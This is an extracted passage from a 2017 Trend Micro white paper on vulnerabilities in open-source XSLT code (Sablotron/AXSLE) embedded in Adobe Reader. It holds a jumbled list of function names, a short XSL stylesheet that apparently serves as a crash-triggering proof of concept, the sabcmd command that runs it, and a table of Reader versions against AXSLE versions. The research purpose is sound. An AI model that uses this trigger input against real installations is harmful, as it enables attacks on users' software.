![Page 40: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/40.jpg)
A Trend Micro White Paper | May 2017
Page 40 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
createLPContextSum createLPContextSum
createLPContext createLPContextLevel
createLPContextLevel trueFor
Expression::trueFor eval
eval EXFOTHERFUNC Err1
Err1 report() NOT_OK
newc filteredc
Expression::createContext
Err1
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:template match="/">
<xsl:for-each select="a">
<xsl:sort select="(/)/*[a()]"/>
</xsl:for-each>
</xsl:template>
</xsl:stylesheet>
./sabcmd input.xsl input.xml
![Page 41: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/41.jpg)
A Trend Micro White Paper | May 2017
Page 41 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
![Page 42: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/42.jpg)
A Trend Micro White Paper | May 2017
Page 42 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
![Page 43: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/43.jpg)
A Trend Micro White Paper | May 2017
Page 43 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
![Page 44: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/44.jpg)
A Trend Micro White Paper | May 2017
Page 44 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
When looking at the version number for AXSLE.dll compared to the version numbers for Adobe Reader, it becomes
apparent that Reader numbers increment at a different rate than AXSLE. It is hypothesized that the only changes to the
AXSLE version occur due to security fixes. No new functionality is seen in the AXSLE versions that increment even
throughout major version changes to Reader.
Adobe Reader-Major Version Minor Version AXSLE Version
9 9.0.0 3.4.102.1
9.1.0 3.4.102.1
9.1.1 3.4.102.1 9.1.2 3.4.102.1 9.1.3 3.4.102.1
9.2 3.4.102.1 9.3 3.4.102.1
9.3.1 3.4.102.1 9.3.2 3.4.102.1
9.3.3 3.4.102.1
9.3.4 3.4.102.1 9.4.0 3.4.102.1
9.4.1 3.4.102.1 9.4.2 3.4.102.1 9.4.3 3.4.102.1
9.4.4 3.4.102.1 9.4.5 3.4.102.1
9.4.6 3.4.102.1 9.4.7 3.4.102.1 9.5 3.4.102.1
9.5.1 3.4.102.1 9.5.2 3.4.502.1
9.5.3 3.4.503.1 9.5.4 3.4.503.1 9.5.5 3.4.503.1
10 10.0.0 3.6.102.10630
10.0.1 3.6.102.10630
10.1.0 3.6.102.10630
10.1.1 3.6.102.10630 10.1.2 3.6.102.10630
10.1.3 3.6.102.10630 10.1.4 3.6.502.20973
10.1.5 3.6.502.26194 10.1.6 3.6.502.26194
10.1.7 3.6.502.26194
10.1.8 3.6.502.26194 10.1.9 3.6.502.26194
10.1.10 3.6.502.26194 10.1.11 3.6.502.26194 10.1.12 3.6.502.26194
10.1.13 3.6.502.26194
10.1.14 3.6.502.26194
10.1.15 3.6.502.26194 10.1.16 3.6.502.26194
11 11.0.0 3.7.101.21186
![Page 45: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/45.jpg)
A Trend Micro White Paper | May 2017
Page 45 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
11.0.01 3.7.101.21186 11.0.02 3.7.101.21186
11.0.03 3.7.101.21186
11.0.04 3.7.101.21186
11.0.05 3.7.101.21186 11.0.06 3.7.101.21186
11.0.07 3.7.101.21186 11.0.08 3.7.101.21186 11.0.09 3.7.101.21186
11.0.10 3.7.101.21186
11.0.11 3.7.101.21186
11.0.12 3.7.101.21186 11.0.13 3.7.101.21186 11.0.14 3.7.101.21186
11.0.15 3.7.101.21186 11.0.16 3.7.101.21186
11.0.17 3.7.101.36545 11.0.18 3.7.101.37153 11.0.19 3.7.101.37637
11.0.20 3.7.101.37991
![Page 46: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/46.jpg)
A Trend Micro White Paper | May 2017
Page 46 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications